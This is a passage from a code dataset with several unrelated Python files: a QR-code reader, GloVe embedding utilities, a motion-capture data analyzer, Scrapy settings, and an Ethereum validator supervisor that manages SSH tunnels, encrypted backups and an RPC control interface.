cv2.VideoCapture(0)\r\n\r\nstart = None\r\nwhile True:\r\n ret, frame = cap.read()\r\n end = time.time()\r\n frame = cv2.flip(frame, 1)\r\n frame = zoom_center(frame, 1)\r\n frame, ckd, start = read_qrcode(frame, ckd, start)\r\n if start != None:\r\n print(int(end-start))\r\n if int(end-start) > 20:\r\n ckd = None\r\n start = None\r\n cv2.imshow(\"QR code reader\", frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord(\"m\"):\r\n ser.write(\"m\".encode(\"ascii\"))\r\n if cv2.waitKey(1) & 0xFF == ord(\"d\"):\r\n ckd = None \r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"nhattminh160901/NCKH2021-2022","sub_path":"maqr/scanqr.py","file_name":"scanqr.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20622784810","text":"import numpy as np\n\nGLOVE_ROOTPATH = '../embedding_data/'\nGLOVE_DEFAULT_FILENAME = 'glove.6B.{}d.txt'\n\ndef build_pretrained_embedding(f):\n ''' \n Builds pretrained embedding dictionary from inputed GloVe file \\\\\n Returns a dictionary (`key`: word, `value`: word vector)\n '''\n embeddings_index = {}\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n return embeddings_index\n\ndef generate_ngram_matrix(texts, emb_dim=100, glove_path=GLOVE_ROOTPATH, glove_filename=GLOVE_DEFAULT_FILENAME):\n '''\n Builds a 2D matrix representation of the inputed `texts`\n using pretrained GloVe word embeddings.\n\n `emb_dim` must be 50, 100, 200, or 300\n\n Returns a numpy matrix with shape (?, emb_dim)\n '''\n if emb_dim not in {50, 100, 200, 300}: raise ValueError('emb_dim must be 50, 100, 200, or 300')\n f = open(glove_path + glove_filename.format(str(emb_dim)))\n emb_dict = build_pretrained_embedding(f)\n\n line_vecs = []\n for line in texts:\n vecs = []\n words = line.split(' ')\n for word in words:\n if word not in emb_dict:\n vec = np.zeros(emb_dim)\n else:\n vec = emb_dict[word]\n vecs.append(vec)\n\n line_vec = np.stack(vecs)\n line_vecs.append(line_vec)\n \n return np.stack(line_vecs)\n\ndef flatten_sentence_vectors(word_matrix):\n '''\n Returns a flattened 1D vector per sentence, with \n length equal to number of words in the sentence and\n the embedding dimension.\n\n Requires a word matrix, like the one generated by\n `generate_glove_word_vectors()`, as input.\n\n This function WILL NOT look at the pretrained \n embeddings itself, it simply flattens the matrix\n representation.\n\n in_shape: (?, x, y)\n out_shape: (?, x*y)\n '''\n new_vecs = []\n for sent_vec in word_matrix:\n r, c = sent_vec.shape\n new_vec = sent_vec.reshape((r*c))\n new_vecs.append(new_vec)\n \n return np.stack(new_vecs)\n\ndef check_embedding(text, text_embedding, emb_dict):\n '''\n Simple check to make sure an inputted sentence\n or text fragment correctly matches a matrix\n of word vectors.\n\n `text`: text fragment (str) \\\\\n `text_embedding`: appended word vectors to check \\\\\n `emb_dict`: dictionary containing embeddings\n '''\n for word, word_emb in zip(text.split(), text_embedding):\n if (emb_dict[word] != word_emb).all(): return False\n return True","repo_name":"jayantmadugula/aspect_detection_models","sub_path":"absa_code/preprocessing/embedding_generation.py","file_name":"embedding_generation.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8922419919","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\nimport pickle\n\n\n# variables\n\n# file location\njson_addr = \"H:\\\\human recorder raw\\\\05210101.json\"\n# plot settings\nuse_plot = False\n# devide by ','.\n# M/F/B: male, female, both; H/J0-J24: head, joint number; Ro/Pi/Ya/X/Y/Z: roll, pitch, yaw, x, y, z;\nplot_pattern = \"F,H,RoPiYa\"\ninterp_pattern = \"F,H,Ya\"\n\n\n# plot\ndef plot(humans, joints, dimensions, interpolation=None):\n if len(humans) * len(joints) * len(dimensions) == 0:\n raise IndexError('empty plot parameter.')\n # get data\n for human in humans:\n for joint in joints:\n for dimension in dimensions:\n if joint == 'H':\n if dimension in ['x', 'y', 'z']:\n continue\n plot_data = human.__getattribute__(dimension)\n # plot\n data = np.array(plot_data)\n plt.title(f'{human.trackingId}, {human.gender}, {joint}, {dimension}')\n plt.plot(data, 'o')\n plt.show()\n else:\n dim_order = ['x', 'y', 'z', 'roll', 'pitch', 'yaw']\n plot_data = human.__getattribute__('joint_' + str(joint))\n plot_data = [plot_data[i][dim_order.index(dimension)] for i in range(len(plot_data))]\n # plot\n data = np.array(plot_data)\n plt.title(f'{human.trackingId}, {human.gender}, {joint}, {dimension}')\n plt.plot(data, 'o')\n plt.show()\n\n\n# get all target axis\ndef pick_axis(humans, pattern):\n parameters = pattern.split(',')\n if len(parameters) != 3:\n raise IndexError('wrong pattern.')\n # pick subject\n subjects = []\n if parameters[0] == 'F':\n subjects.append(pick_human(humans, 'gender', 'female'))\n elif parameters[0] == 'M':\n subjects.append(pick_human(humans, 'gender', 'male'))\n elif parameters[0] == 'B':\n subjects.append(pick_human(humans, 'gender', 'female'))\n subjects.append(pick_human(humans, 'gender', 'male'))\n else:\n raise ValueError('wrong pattern of subject picking.')\n # pick joints\n joints = []\n if 'H' in parameters[1]:\n joints.append('H')\n joints.remove('H')\n body_joints = parameters[1].split('J')\n for joint in body_joints:\n if len(joint) != 0:\n joints.append(joint)\n # pick dimensions\n dims = []\n if 'Ro' in parameters[2]:\n dims.append('roll')\n if 'Pi' in parameters[2]:\n dims.append('pitch')\n if 'Ya' in parameters[2]:\n dims.append('yaw')\n if 'X' in parameters[2]:\n dims.append('x')\n # Ya has Y!\n if 'Ya' not in parameters[2] and 'Y' in parameters[2]:\n dims.append('y')\n if 'Z' in parameters[2]:\n dims.append('z')\n\n return subjects, joints, dims\n\n\n# class to store data per human\nclass Human:\n def __init__(self, trackingId):\n self.trackingId = trackingId\n self.gender = 'not assigned'\n # head dir\n self.roll = []\n self.pitch = []\n self.yaw = []\n # joints\n self.joint_0 = []\n self.joint_1 = []\n self.joint_2 = []\n self.joint_3 = []\n self.joint_4 = []\n self.joint_5 = []\n self.joint_6 = []\n self.joint_7 = []\n self.joint_8 = []\n self.joint_9 = []\n self.joint_10 = []\n self.joint_11 = []\n self.joint_12 = []\n self.joint_13 = []\n self.joint_14 = []\n self.joint_15 = []\n self.joint_16 = []\n self.joint_17 = []\n self.joint_18 = []\n self.joint_19 = []\n self.joint_20 = []\n self.joint_21 = []\n self.joint_22 = []\n self.joint_23 = []\n self.joint_24 = []\n\n\ndef pick_human(humans, attr, value):\n for human in humans:\n if value == human.__getattribute__(attr):\n return human\n # return untracked human if no matches\n return humans[0]\n\n\ndef main():\n # 0. who am I\n\n print('>>> WHOAMI:')\n file_name = json_addr.split('\\\\')[-1][:-5]\n print('Experiment date: 2018.' + file_name[0:2] + '.' + file_name[2:4])\n print('Experiment shift: ' + file_name[4:6])\n print('Experiment session: ' + file_name[6:8])\n\n # 1. load\n\n print('>>> LOAD:')\n # separate each object\n # decode error: only one json object each file. one pair of {}.\n print('Loading file...')\n json_objects = []\n # r: read only, w: write only!!! DO NOT use w!!!\n with open(json_addr, 'r') as f:\n bracket_stack = 0\n json_obj = []\n for line in f:\n line = line.rstrip()\n if line[-1] == '{':\n bracket_stack += 1\n if line[-1] == '}':\n bracket_stack -= 1\n # may end with '},'\n if len(line) >= 2 and line[-2] == '}':\n bracket_stack -= 1\n json_obj.append(line)\n if bracket_stack == 0:\n json_objects.append(json_obj)\n # list.clear() clears list element in list as well.\n json_obj = []\n\n # parse each object\n json_rawdata = []\n for obj in json_objects:\n obj_str = '\\n'.join(obj)\n # load: file-like obj, loads: str, bytes, bytearray\n rawdata = json.loads(obj_str)\n json_rawdata.append(rawdata)\n\n assert len(json_objects) == len(json_rawdata)\n frame_num = len(json_rawdata) - 1\n print('Frame number: ' + str(frame_num))\n\n # 2. extract & store\n\n print('>>> STORE:')\n # start timestamp\n if 'start time' not in json_rawdata[0]:\n raise ValueError('time stamp missing')\n start_time = json_rawdata[0]['start time']\n print('Json file starts at: ' + str(start_time))\n del json_rawdata[0]\n\n # traverse through each frame\n # TODO fill the other one if body count = 1\n id_list = []\n humans = [Human(0)]\n for frame in json_rawdata:\n # check body count\n body_count = len(frame['people'])\n\n if body_count == 0:\n continue\n\n for n in range(body_count):\n # tracking ID, human struct\n trackingId = 0\n if 'trackingId' in frame['people'][n]:\n trackingId = frame['people'][n]['trackingId']\n if trackingId not in id_list:\n id_list.append(trackingId)\n humans.append(Human(trackingId))\n print(f'Created human with id: {trackingId}')\n\n human = pick_human(humans, 'trackingId', trackingId)\n\n # head orientation: pitch yaw roll\n pitch, yaw, roll = (0.0, 0.0, 0.0) # when no data\n if 'head dir' in frame['people'][n]:\n pitch, yaw, roll = (float(degree) for degree in frame['people'][n]['head dir'].split(','))\n human.pitch.append(pitch)\n human.roll.append(roll)\n human.yaw.append(yaw)\n\n # joints: 0 - 24\n for joint in range(25):\n joint_value = [0.0] * 6\n if str(joint) in frame['people'][n]:\n joint_value = frame['people'][n][str(joint)]\n value_list = human.__getattribute__('joint_' + str(joint))\n value_list.append(joint_value)\n\n # 3. gender\n\n # use average position of head joint.\n # get most longest two human instances, suggest they are valid subjects.\n if len(humans) < 2:\n raise IndexError('less than 2 humans.')\n humans.sort(key=lambda x: len(x.joint_3), reverse=True)\n person1 = humans[0]\n person2 = humans[1]\n # get horizontal coordinates of head joint\n person1_data = [person1.joint_3[i][1] for i in range(len(person1.joint_3))]\n person2_data = [person2.joint_3[i][1] for i in range(len(person2.joint_3))]\n if sum(person1_data) / len(person1_data) < sum(person2_data) / len(person2_data):\n person1.gender = 'female'\n person2.gender = 'male'\n else:\n person1.gender = 'male'\n person2.gender = 'female'\n\n # 4. plot\n\n if use_plot:\n plot_subjects, plot_joints, plot_dims = pick_axis(humans, plot_pattern)\n # plot\n plot(plot_subjects, plot_joints, plot_dims)\n\n # 5. time series analyse\n\n # 5.1 missing value process (interpolation)\n print('>>> INTERPOLATE:')\n for human in humans:\n if human.trackingId == 0:\n continue\n\n # data missing rate\n\n # total data count:\n data_count = frame_num * 153 # head 3 + joint 25 * 6\n #print(f'Human ID: {human.trackingId} has total data of: {data_count}')\n # get total missing value count for all axis\n missing_count = 0\n # head\n missing_count += human.roll.count(0)\n missing_count += human.pitch.count(0)\n missing_count += human.yaw.count(0)\n # joints\n for i in range(25):\n joint_data = human.__getattribute__('joint_' + str(i))\n for j in range(6):\n missing_count += [joint_data[n][j] for n in range(len(joint_data))].count(0)\n #print(f'Human ID: {human.trackingId} has Missing Values of: {missing_count}')\n print(f'Human ID: {human.trackingId} \\'s missing rate is: {missing_count/data_count}')\n\n # interpolation (3d spline)\n print('Interpolating...')\n interp_subjects, interp_joints, interp_dims = pick_axis(humans, interp_pattern)\n splines = {}\n for human in interp_subjects:\n for joint in interp_joints:\n for dimension in interp_dims:\n if joint == 'H':\n if dimension in ['x', 'y', 'z']:\n continue\n interp_data = human.__getattribute__(dimension)\n else:\n dim_order = ['x', 'y', 'z', 'roll', 'pitch', 'yaw']\n interp_data = human.__getattribute__('joint_' + str(joint))\n interp_data = [interp_data[i][dim_order.index(dimension)] for i in range(len(interp_data))]\n data = np.array(interp_data)\n # 0 -> np.nan\n np.place(data, data == 0, np.nan)\n # interpolate, see scipy documentation\n x = np.arange(len(data))\n w = np.isnan(data)\n data[w] = 0.\n splines[f'{human.trackingId}&{joint}&{dimension}'] = UnivariateSpline(x, data, w=~w)\n\n # save as pickle\n with open('data.pickle', 'wb') as f:\n pickle.dump(data, f)\n with open('spline.pickle', 'wb') as f:\n pickle.dump(splines[f'{human.trackingId}&{joint}&{dimension}'], f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Sun-Yuting/Human_Recorder_Analyzer","sub_path":"Analyzer.py","file_name":"Analyzer.py","file_ext":"py","file_size_in_byte":10759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14122819379","text":"import os\n\nAPP_FOLDER = 'C:\\\\Users\\\\wanga\\\\Desktop\\\\Personal\\\\Machine Learning\\\\Sophomore AI Class\\\\Bird, Not Bird Data\\\\not_bird'\n\ntotalFiles = 0\ntotalDir = 0\nsubDirs = []\nfirstRunDone = False\n\ndirIndex = 0\nfor _, dirs, files in os.walk(APP_FOLDER):\n if not firstRunDone:\n subDirs = dirs\n firstRunDone = True\n continue\n totalDir += 1\n filesInDir = 0\n for Files in files:\n filesInDir += 1\n print(f'# of files in {subDirs[dirIndex]}: {filesInDir}')\n totalFiles += filesInDir\n dirIndex += 1\n\n\nprint('Total # of files',totalFiles)\nprint('Total # of directories',totalDir)\n","repo_name":"aragorn-w/Bird-Cam","sub_path":"Data Collection Scripts/file_counter.py","file_name":"file_counter.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19370065190","text":"# -*- coding: utf-8 -*-\nfrom splib3.objectmodel import SofaPrefab\n\n@SofaPrefab\nclass Interaction(object):\n \"\"\"\n Store a list of mechanical object to interact with\n\n Args:\n\n targets ([objects]) the object to interact with and that don't have a solver\n\n \"\"\"\n\n def __init__(self, parent, targets):\n self.node = parent.addChild(\"Interaction\")\n self.node.addObject(\"EulerImplicitSolver\")\n self.node.addObject(\"CGLinearSolver\", iterations=25, tolerance=1e-5, threshold=1e-5)\n for target in targets:\n self.node.addChild(target)\n","repo_name":"SofaDefrost/STLIB","sub_path":"python3/src/stlib3/scene/interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"39855496496","text":"# -*- coding: utf-8 -*-\nBOT_NAME = 'gysta'\n\nSPIDER_MODULES = ['gysta.spiders']\nNEWSPIDER_MODULE = 'gysta.spiders'\n\nROBOTSTXT_OBEY = False\n\nDOWNLOAD_DELAY = 3\nDEFAULT_REQUEST_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en',\n 'Referer': 'http://activity.gysta.gov.cn/index.html',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',\n}\n\nITEM_PIPELINES = {\n 'gysta.pipelines.GystaPipeline': 100,\n # 'gysta.pipelines.GystaMongoDBPipeline': 200,\n}\n\n# LOG_LEVEL = \"WARNING\"\n","repo_name":"liurongsheng/Python","sub_path":"爬虫方向/爬虫实例/gysta/gysta/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19225308153","text":"\"\"\"\nThe module exporting the ValidatorSupervisor.\n\nThis module is the main interface for the validator supervisor which is the top level object\nmanaging the Ethereum 2.0 validator and other supporting subprocesses, as well as the remote\ncontrol RPC interface.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport datetime\nimport json\nimport logging\nimport os.path\nimport shutil\nfrom ssl import SSLContext, PROTOCOL_TLS_SERVER\nimport tempfile\nfrom typing import Dict, List, Optional, Union\n\nfrom .backup_archive import BackupArchive, LockedArchiveCorrupted, make_validator_data_backup\nfrom .config import Config, DynamicConfig, read_dynamic_config, write_dynamic_config\nfrom .eip2335 import EIP2335KeystoreSchema\nfrom .exceptions import ValidatorRunning, UnlockRequired, UnknownNode\nfrom .key_ops import RootKey, IncorrectPassword\nfrom .promtail import Promtail\nfrom .rpc.server import RpcServer, RpcTarget\nfrom .ssh import SSHForward, SSHClient, SSHTunnel, TcpSocket, UnixSocket, DEFAULT_BASTION_SSH_PORT\nfrom .subprocess import start_supervised, start_supervised_multi\nfrom .validators import \\\n BeaconNodePortMap, ValidatorRelease, ValidatorRunner, ValidatorReleaseSchema, \\\n create_validator_for_release, get_validator_impls\n\nLOG = logging.getLogger(__name__)\n\nCANONICAL_DIR_NAME = 'canonical'\nSSH_KNOWN_HOSTS_FILENAME = 'ssh_known_hosts'\nCONTROL_RPC_SOCKNAME = 'rpc.sock'\nRETRY_DELAY = 10\nDYNAMIC_CONFIG_FILENAME = 'dynamic_config.yml'\nDEFAULT_VALIDATOR_CONTAINER_NAME = 'validator-supervisor_validator'\n\n\nclass ScpFailure(Exception):\n pass\n\n\nclass OutOfPorts(Exception):\n pass\n\n\nclass ValidatorSupervisor(RpcTarget):\n \"\"\"\n ValidatorSupervisor is the top level object managing the Ethereum 2.0 validator and other\n supporting subprocesses, as well as the remote control RPC interface.\n\n The ValidatorSupervisor initializes and supervises a number of subprocesses, such as SSH\n connections, restarting them if they error or go down. The supervisor opens SSH connections to\n all remote nodes for forwarding local logs to Loki using Promtail and creating a reverse SSH\n tunnel from the remote node to the local JSON-RPC over TCP interface. The supervisor also\n configures and starts the Promtail process and the RPC interface. Most importantly, the\n supervisor selects one remote node at a time to create a SSH tunnel to the beacon node and runs\n a local Ethereum 2.0 validator which connects to the beacon node through that tunnel.\n\n The ValidatorSupervisor also loads and saves archives of the validator state, which are\n encrypted by a key that is only ever stored in RAM on the validator machine. The decryption key\n is provided on initialization, and the supervisor loads the latest backup on startup and saves\n the latest validator state to a new archive on shutdown. These archives are timestamped and\n stored both locally on disk and uploaded to the remote nodes via SCP.\n \"\"\"\n\n _root_key: Optional[RootKey]\n _backup_key: Optional[bytes]\n _exit_event: asyncio.Event\n\n def __init__(\n self,\n config: Config,\n root_key: Optional[RootKey],\n exit_event: asyncio.Event,\n enable_promtail: bool = False,\n retry_delay: int = RETRY_DELAY,\n validator_container_name: str = DEFAULT_VALIDATOR_CONTAINER_NAME,\n ):\n self.nodes = config.nodes\n self.config = config\n self.root_key = root_key\n self._next_port, self._end_port = config.port_range\n self._retry_delay = retry_delay\n self._validator_container_name = validator_container_name\n\n if not config.nodes:\n raise ValueError(\"config must have at least one node\")\n\n self._dynamic_config_path = os.path.join(config.data_dir, DYNAMIC_CONFIG_FILENAME)\n if os.path.exists(self._dynamic_config_path):\n self.dynamic_config = read_dynamic_config(self._dynamic_config_path)\n else:\n self.dynamic_config = DynamicConfig()\n\n self._validator_data_tmpdir = tempfile.TemporaryDirectory(\n prefix='validator_supervisor-validator_data',\n dir='/dev/shm', # Create tempdir in tmpfs\n )\n self._validator_canonical_dir = \\\n os.path.join(self._validator_data_tmpdir.name, CANONICAL_DIR_NAME)\n\n known_hosts_file = os.path.join(self.config.data_dir, SSH_KNOWN_HOSTS_FILENAME)\n known_hosts_lock = asyncio.Lock()\n self.rpc_sock_path = os.path.abspath(\n os.path.join(self.config.data_dir, CONTROL_RPC_SOCKNAME),\n )\n\n self._beacon_node_port_maps = [\n BeaconNodePortMap(\n host_id=(node.host, node.port),\n lighthouse_rpc=self._alloc_port(),\n prysm_http=self._alloc_port(),\n prysm_grpc=self._alloc_port(),\n )\n for node in config.nodes\n ]\n port_maps: List[List[Union[SSHForward]]] = [\n [\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.prysm_http),\n TcpSocket('host.docker.internal', 3500),\n ),\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.prysm_grpc),\n TcpSocket('host.docker.internal', 4000),\n ),\n SSHForward(\n TcpSocket.localhost(beacon_node_port_map.lighthouse_rpc),\n TcpSocket('host.docker.internal', 5052),\n ),\n SSHForward(TcpSocket.localhost(self._alloc_port()), TcpSocket('loki', 3100)),\n # Reverse tunnel to local SSH server\n SSHForward(TcpSocket.localhost(22), TcpSocket.localhost(2222), reverse=True),\n # Reverse tunnel to lighthouse validator Prometheus server\n SSHForward(\n TcpSocket.localhost(5064), TcpSocket('validator-proxy', 5064), reverse=True,\n ),\n # Reverse tunnel to prysm validator Prometheus server\n SSHForward(\n TcpSocket.localhost(8081), TcpSocket('validator-proxy', 8081), reverse=True,\n ),\n # Reverse tunnel to RPC server\n SSHForward(UnixSocket(self.rpc_sock_path), TcpSocket.localhost(8000), reverse=True),\n ]\n for beacon_node_port_map in self._beacon_node_port_maps\n ]\n _, _, _, loki_tunnels, _, _, _, _ = zip(*port_maps)\n self._ssh_clients = [\n SSHClient(node, known_hosts_file, known_hosts_lock)\n for node in config.nodes\n ]\n self._ssh_tunnels = [\n SSHTunnel(client, tunnels)\n for client, tunnels in zip(self._ssh_clients, port_maps)\n ]\n if enable_promtail:\n log_paths = {\n 'validator_supervisor': self.config.supervisor_log_path,\n }\n for impl_name in get_validator_impls():\n log_paths[impl_name] = self.config.validator_log_path(impl_name)\n self._promtails = [\n Promtail(\n node.host,\n forward.local.port,\n self.config.logs_dir,\n log_paths,\n )\n for node, forward in zip(config.nodes, loki_tunnels)\n ]\n else:\n LOG.debug(\"Promtail disabled\")\n self._promtails = []\n self._validator: Optional[ValidatorRunner] = None\n self._validator_stop_event = asyncio.Event()\n self._validator_task: Optional[asyncio.Task] = None\n\n ssl = None\n if config.ssl_cert_file:\n ssl = SSLContext(PROTOCOL_TLS_SERVER)\n ssl.load_cert_chain(config.ssl_cert_file, config.ssl_key_file)\n self._rpc_server = RpcServer(self, config.rpc_users, self.rpc_sock_path, ssl)\n self._exit_event = exit_event\n\n def _alloc_port(self) -> int:\n if self._next_port == self._end_port:\n raise OutOfPorts()\n port = self._next_port\n self._next_port += 1\n return port\n\n @property\n def eth2_network(self) -> str:\n \"\"\"The name of the Ethereum 2.0 network to validate on. (eg. mainnet, pyrmont, etc.)\"\"\"\n return self.config.eth2_network\n\n async def run(self) -> None:\n \"\"\"\n Activate the supervisor, starting the RPC server, SSH tunnels, and other subprocesses.\n\n If the supervisor is already unlocked, this starts the validator subprocess as well.\n\n See class documentation for supervisor responsibilities.\n \"\"\"\n await self._rpc_server.start()\n\n stop_ssh_tunnels = asyncio.Event()\n ssh_tunnel_tasks = await start_supervised_multi(\n [(f\"SSH tunnel to {ssh_tunnel.client.node}\", ssh_tunnel)\n for ssh_tunnel in self._ssh_tunnels],\n self._retry_delay,\n stop_ssh_tunnels,\n )\n\n stop_promtails = asyncio.Event()\n promtail_tasks = await start_supervised_multi(\n [(f\"promtail to {promtail.node}\", promtail) for promtail in self._promtails],\n self._retry_delay,\n stop_promtails,\n )\n\n try:\n await self.start_validator()\n except UnlockRequired:\n LOG.info(\"Waiting for supervisor to be unlocked\")\n except Exception as err:\n LOG.exception(f\"Error starting supervisor\", exc_info=err)\n\n await self._exit_event.wait()\n LOG.debug(\"Exiting\")\n\n # Shutdown time.\n await self._rpc_server.stop()\n await self.stop_validator()\n\n if self._promtails:\n LOG.debug(\"Stopping Promtails\")\n\n # Give Promtail a bit of time to finish uploading logs.\n await asyncio.sleep(3)\n\n stop_promtails.set()\n if promtail_tasks:\n await asyncio.wait(promtail_tasks)\n\n LOG.debug(\"Stopping SSH tunnels\")\n stop_ssh_tunnels.set()\n if ssh_tunnel_tasks:\n await asyncio.wait(ssh_tunnel_tasks)\n\n self._validator_data_tmpdir.cleanup()\n\n async def load_backup(self) -> bool:\n \"\"\"\n Load the latest backup archive containing validator state.\n\n This checks all reachable remote nodes for backups as well as the backup stored locally,\n then decrypts and unpacks the most recent.\n\n :return: whether a backup archive was successfully found and loaded\n :raises UnlockRequired: if supervisor needs to be unlocked\n :raises ValidatorRunning: if the validator is currently running\n \"\"\"\n if self._backup_key is None:\n raise UnlockRequired()\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n latest_backup = None\n if os.path.isfile(self._backup_path):\n with open(self._backup_path, 'rb') as f:\n try:\n LOG.info(f\"On disk backup {self._backup_path} len is {len(f.read())}\")\n f.seek(0)\n latest_backup = BackupArchive.unlock(self._backup_key, f)\n except LockedArchiveCorrupted:\n LOG.error(\"On disk backup is corrupt!\")\n\n for client in self._ssh_clients:\n with tempfile.NamedTemporaryFile(prefix=\"supervisor-backup\", suffix=\".bin\", mode=\"w+b\") as downloaded_f:\n try:\n remote_path = f\"~/supervisor-backups/{self._backup_filename}\"\n if not await client.copy_remote_to_local(remote_path, downloaded_f.name):\n LOG.warning(f\"Failed to download scp backup from {client.node}\")\n continue\n\n downloaded_f.seek(0)\n LOG.info(f\"Downloaded len is {len(downloaded_f.read())}\")\n downloaded_f.seek(0)\n new_backup = BackupArchive.unlock(self._backup_key, downloaded_f)\n if latest_backup is None or latest_backup.timestamp < new_backup.timestamp:\n latest_backup = new_backup\n shutil.copy(downloaded_f.name, self._backup_path)\n except LockedArchiveCorrupted:\n LOG.warning(f\"Backup archive on node {client.node} is corrupt!\")\n\n if latest_backup is None:\n LOG.error(\"Could not find any valid backups\")\n return False\n\n backup_time = datetime.datetime.fromtimestamp(latest_backup.timestamp)\n LOG.info(f\"Loading backup from {backup_time.isoformat()}\")\n latest_backup.unpack(self._validator_canonical_dir)\n return True\n\n async def save_backup(self) -> None:\n \"\"\"\n Save the current validator state to a backup archive.\n\n This saves the new encrypted archive persistently and uploads to all reachable remote\n nodes via SCP.\n\n :raises UnlockRequired: if supervisor needs to be unlocked\n :raises ValidatorRunning: if the validator is currently running\n \"\"\"\n if self._backup_key is None:\n raise UnlockRequired()\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n LOG.debug(f\"Saving backup to {self._backup_filename}\")\n make_validator_data_backup(self._backup_key, self._backup_path, self._validator_canonical_dir)\n for client in self._ssh_clients:\n remote_path = f\"~/supervisor-backups/{self._backup_filename}\"\n if await client.copy_local_to_remote(self._backup_path, remote_path):\n LOG.debug(f\"Uploaded scp backup to {client.node}\")\n else:\n LOG.warning(f\"Failed to upload scp backup to {client.node}\")\n\n async def start_validator(self) -> bool:\n \"\"\"\n Start the validator subprocess.\n\n Loads the latest backup before launching.\n\n :return: true if validator was not running and is now started, false if already running\n :raises UnlockRequired: if the supervisor is not unlocked\n \"\"\"\n if self._validator_task is not None:\n return False\n\n await self.load_backup()\n self._validator = await self._create_validator_for_release(\n self.dynamic_config.validator_release\n )\n self._validator_stop_event = asyncio.Event()\n self._validator_task = await start_supervised(\n 'validator',\n self._validator,\n self._retry_delay,\n self._validator_stop_event,\n )\n return True\n\n async def stop_validator(self) -> bool:\n \"\"\"\n Stop the validator subprocess if currently running.\n\n Saves the latest backup after exiting.\n\n :return: true if validator was running and is now stopped, false if not running\n \"\"\"\n if self._validator_task is None:\n return False\n\n self._validator_stop_event.set()\n await self._validator_task\n self._validator = None\n self._validator_task = None\n await self.save_backup()\n return True\n\n async def set_validator_release(self, release: ValidatorRelease):\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n _ = await self._create_validator_for_release(release)\n self.dynamic_config.validator_release = release\n write_dynamic_config(self._dynamic_config_path, self.dynamic_config)\n\n async def connect_eth2_node(self, host: str, port: Optional[int]):\n \"\"\"\n Connect the validator to the beacon node running on a particular remote host.\n\n This only prioritizes this specified node. If the host:port destination is either not in\n the config file or not reachable, the supervisor will fall back to another configured\n beacon node.\n\n :param host: the hostname or IP address of the destination\n :param port: the port to the SSH server on the destination\n :raise UnknownNode: if the given node is not already configured\n \"\"\"\n port = port if port is not None else DEFAULT_BASTION_SSH_PORT\n self._prioritize_beacon_node(host, port)\n if self._validator is not None:\n self._validator.beacon_node_ports = self._beacon_node_port_maps\n # Stop the validator, so it restarts and checks the updated order\n self._validator.stop()\n\n async def get_health(self) -> Dict[str, object]:\n \"\"\"\n Returns a dictionary of supervisor status info.\n\n :return: a dictionary of status info\n \"\"\"\n return {\n 'unlocked': self.root_key is not None,\n 'validator_running': self._validator_task is not None,\n 'connected_node': self._validator and self._validator.get_connected_node_host(),\n 'validator_release':\n ValidatorReleaseSchema().dump(self.dynamic_config.validator_release),\n }\n\n async def unlock(self, password: str) -> bool:\n \"\"\"\n Unlock the root key with the password.\n\n Required to load backups and start validator.\n\n :param password: the password\n :return: true if unlock was successful, false on incorrect password\n \"\"\"\n try:\n self.root_key = self.config.key_desc.open(password)\n return True\n except IncorrectPassword:\n return False\n\n async def shutdown(self) -> None:\n \"\"\"Executes the shutdown command on the system and powers down the machine.\"\"\"\n asyncio.create_task(self._shutdown_command())\n\n async def import_keystore(self, keystore: str, password: str) -> None:\n keystore_data = EIP2335KeystoreSchema().load(json.loads(keystore))\n pubkey = f\"0x{keystore_data.pubkey}\"\n\n # This is an assertion as this should be guaranteed by the regex validation on the pubkey\n # field in the keystore schema\n assert os.path.normpath(pubkey) == pubkey\n\n validator_dir = os.path.join(self._validator_canonical_dir, 'validators', pubkey)\n\n await self.load_backup()\n os.makedirs(validator_dir, exist_ok=True)\n with open(os.path.join(validator_dir, 'keystore.json'), 'w') as f:\n f.write(keystore)\n with open(os.path.join(validator_dir, 'password.txt'), 'w') as f:\n f.write(password)\n await self.save_backup()\n\n async def _shutdown_command(self) -> None:\n LOG.info(\"Executing shutdown to shut down the host\")\n proc = await asyncio.create_subprocess_exec('sudo', 'shutdown', 'now')\n await proc.wait()\n LOG.info(f\"shutdown exited with status {proc.returncode}\")\n\n @property\n def _backup_filename(self):\n return self.config.backup_filename\n\n @property\n def _backup_path(self) -> str:\n return os.path.join(self.config.data_dir, self._backup_filename)\n\n @property\n def root_key(self) -> Optional[RootKey]:\n return self._root_key\n\n @root_key.setter\n def root_key(self, root_key: Optional[RootKey]):\n self._root_key = root_key\n if root_key is None:\n self._backup_key = None\n else:\n self._backup_key = root_key.derive_backup_key()\n\n def _prioritize_beacon_node(self, host: str, port: int):\n \"\"\"\n Prioritize future connections to a particular node.\n\n :param host: the host address\n :param port: the bastion port of the host through which connections are tunnelled\n :raise UnknownNode: if given host, port pair is not a configured 